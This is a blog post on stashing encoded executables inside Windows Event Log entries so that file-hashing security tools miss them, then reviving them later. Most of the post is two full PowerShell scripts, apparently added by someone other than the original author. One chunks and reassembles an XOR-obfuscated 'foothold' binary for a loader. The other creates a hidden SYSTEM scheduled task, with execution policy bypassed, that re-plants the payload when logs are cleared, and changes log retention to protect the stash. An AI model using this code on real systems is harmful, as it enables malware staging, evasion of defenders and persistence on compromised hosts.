Friday, January 22, 2016

You Can Run And You Can Hide...

With increased scrutiny of files written to disk, one is left with the question: where could I stash binary content and execute it later? There are lots of places. Image files, the Registry, etc...

One place that I have found convenient is the Event Log. Some event sources let you attach raw binary data to a log entry (the raw-data field of ReportEvent). One example is the WSH logs. I think VSS too, but I haven't tested it. Anyway, there are probably others...

This matters because many security products record and hash any executable file written to disk. A payload sitting inside a log entry is never written as an executable file, so that hashing never sees it.

So first we create our binary and encode/encrypt it or whatever.

Based on what I found, a single WSH entry is limited to about 31389 bytes of raw data. The ReportEvent documentation covers the underlying limits:

https://msdn.microsoft.com/EN-US/library/windows/desktop/aa363679.aspx

Plenty of space for a small foothold.

For larger binaries, the prototype linked at the end includes code to split the payload across several entries and reassemble it.
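Here is the full write-and-read cycle as an added PowerShell example. It is not the original post's gist; it is my own illustration of the technique. It assumes you run elevated, that the "WSH" source is registered in the Application log on your host (checked at the top; if not, register your own with New-EventLog), that the chunk size is the ~31389-byte limit reported above, and that the XOR key is only a stand-in for whatever encoding or encryption you actually use. The input path C:\tools\foothold.exe is assumed.

```powershell
# Added example, not the post's own code: stash a binary in the Application
# log under the WSH source, one event per chunk, then read it back.
# Assumptions: elevated session; "WSH" source registered; ChunkSize is the
# ~31389-byte per-entry limit the post reports; the XOR key is a stand-in.

$LogName   = 'Application'
$Source    = 'WSH'
$ChunkSize = 31389
$Key       = [Text.Encoding]::ASCII.GetBytes('stash-key')   # stand-in "encryption"

if (-not [Diagnostics.EventLog]::SourceExists($Source)) {
    throw "source '$Source' is not registered; create one with New-EventLog -LogName $LogName -Source <name>"
}

# Repeating-key XOR: symmetric, so the same call encodes and decodes.
function Invoke-XorBytes {
    param([byte[]]$Data, [byte[]]$Key)
    $out = New-Object byte[] $Data.Length
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = $Data[$i] -bxor $Key[$i % $Key.Length]
    }
    return ,$out
}

function Get-Sha256Hex {
    param([byte[]]$Data)
    $sha = [Security.Cryptography.SHA256]::Create()
    return ([BitConverter]::ToString($sha.ComputeHash($Data))).Replace('-', '')
}

# Split the encoded payload into chunks and write one event per chunk.
# The message carries a stash id plus index/total, so reassembly depends
# neither on event ordering nor on other WSH events already in the log.
function Write-LogStash {
    param([byte[]]$Payload)
    $encoded = Invoke-XorBytes -Data $Payload -Key $Key
    $stashId = [guid]::NewGuid().ToString()
    $total   = [int][Math]::Ceiling($encoded.Length / $ChunkSize)
    for ($i = 0; $i -lt $total; $i++) {
        $offset = $i * $ChunkSize
        $len    = [Math]::Min($ChunkSize, $encoded.Length - $offset)
        $chunk  = New-Object byte[] $len
        [Array]::Copy($encoded, $offset, $chunk, 0, $len)
        Write-EventLog -LogName $LogName -Source $Source -EventId 1 -EntryType Information `
            -Message "stash:$stashId $i/$total" -RawData $chunk
    }
    return $stashId
}

# Collect every chunk for a stash id, order by index, reassemble, decode.
# The match is unanchored because the viewer may wrap the message in
# "The description for Event ID ... cannot be found" boilerplate.
function Read-LogStash {
    param([string]$StashId)
    $pattern = "stash:$StashId (?<idx>\d+)/(?<total>\d+)"
    $chunks = @{}
    $total = $null
    Get-EventLog -LogName $LogName -Source $Source |
        Where-Object { $_.Message -match $pattern } |
        ForEach-Object {
            $m = [regex]::Match($_.Message, $pattern)
            $chunks[[int]$m.Groups['idx'].Value] = $_.Data   # .Data is the raw byte[]
            $total = [int]$m.Groups['total'].Value
        }
    if ($null -eq $total -or $chunks.Count -ne $total) {
        throw "stash $StashId incomplete: found $($chunks.Count) of $total chunks"
    }
    $ms = New-Object IO.MemoryStream
    for ($i = 0; $i -lt $total; $i++) { $ms.Write($chunks[$i], 0, $chunks[$i].Length) }
    return ,(Invoke-XorBytes -Data $ms.ToArray() -Key $Key)
}

# Usage: stash a file, read it back, and verify the round trip by hash.
$original = [IO.File]::ReadAllBytes('C:\tools\foothold.exe')   # assumed path
$id       = Write-LogStash -Payload $original
$restored = Read-LogStash -StashId $id
if ((Get-Sha256Hex $restored) -ne (Get-Sha256Hex $original)) { throw 'round trip failed' }
[IO.File]::WriteAllBytes("$env:TEMP\restored.bin", $restored)   # or hand $restored to a loader
```

The hash check at the end is the part worth keeping: a log that has rolled over, or a second stash sharing the source, will silently give you a truncated or mixed payload otherwise, and the index/total tag makes that failure explicit rather than a crash on execution.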

Once the content is stashed in the Event Log, you can revive it with an event log trigger (a scheduled task that fires on a chosen event) or some other mechanism:

http://blogs.technet.com/b/wincat/archive/2011/08/25/trigger-a-powershell-script-from-a-windows-event.aspx

Things to consider.
1.  If the event log is cleared, the stash goes with it, so you need to replace the content. You could attach a trigger to the log-cleared event to rehydrate it (from somewhere other than the cleared log, obviously).
Other areas to explore would be writing to custom logs, as described here:
http://www.codeproject.com/Articles/39218/How-To-Create-a-Windows-Event-Log-and-Write-your-C

2.  You may consider adjusting log retention so the entries are not overwritten as the log fills:
https://technet.microsoft.com/en-us/library/cc721981.aspx
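Both considerations in one added PowerShell example of my own (not code from the post or the linked articles): a scheduled task that fires on the "log cleared" event and runs a rehydrate script, plus a retention change so routine churn does not rotate the stash out first. It assumes an elevated session, that the Application log holds the stash, and that C:\ProgramData\rehydrate.ps1 is a script you supply that re-writes the payload from somewhere other than the cleared log. The task name is arbitrary.

```powershell
# Added example, not the post's own code: re-plant the stash when the log
# is cleared, and widen retention so it is not overwritten in the meantime.
# Assumptions: elevated session; rehydrate.ps1 is your own script that
# re-writes the stash (the cleared log cannot be the source of its own
# replacement); the stash lives in the Application log.

$RehydrateScript = 'C:\ProgramData\rehydrate.ps1'   # assumed path
$TaskName        = 'EventLogRehydrate'              # arbitrary

# Event ID 104 from the Microsoft-Windows-Eventlog provider, written to the
# System log, records "The <name> log file was cleared". It fires for any
# administrative log being cleared, so rehydrate.ps1 should be safe to run
# more often than strictly needed.
$Query = "*[System[Provider[@Name='Microsoft-Windows-Eventlog'] and EventID=104]]"

# /SC ONEVENT + /EC (channel) + /MO (XPath) is the event-trigger form of
# schtasks; it matches what the Task Scheduler GUI builds from the event.
schtasks.exe /Create /F /RU SYSTEM /SC ONEVENT /EC System /MO $Query `
    /TN $TaskName `
    /TR "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File $RehydrateScript"

# Retention: by default the Application log overwrites the oldest events once
# it is full. Raise the cap and only overwrite entries older than 30 days,
# so the stash survives normal logging volume without the log ever refusing
# new events (DoNotOverwrite would make that refusal visible).
Limit-EventLog -LogName Application -MaximumSize 64MB -OverflowAction OverwriteOlder -RetentionDays 30

# Check that both changes took.
Get-ScheduledTask -TaskName $TaskName | Select-Object TaskName, State
Get-EventLog -List | Where-Object { $_.Log -eq 'Application' } |
    Select-Object Log, MaximumKilobytes, OverflowAction, MinimumRetentionDays
```

The retention change is itself a configuration event that defenders can alert on, and the task shows up in the task library under the name you gave it; neither is hidden, they just stop the stash from evaporating on its own.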

Keep in mind the stash is still visible to anyone who inspects the log: entries under a source that normally carries no binary payload, each with a Data blob of tens of kilobytes, are easy to hunt for. There are probably better ideas and other tricks here to explore; I'd be curious to get your feedback.

Here's a full prototype:

https://gist.github.com/subTee/08d9954b685ce2584f22


That's all for now.




Cheers,

Casey
@subTee

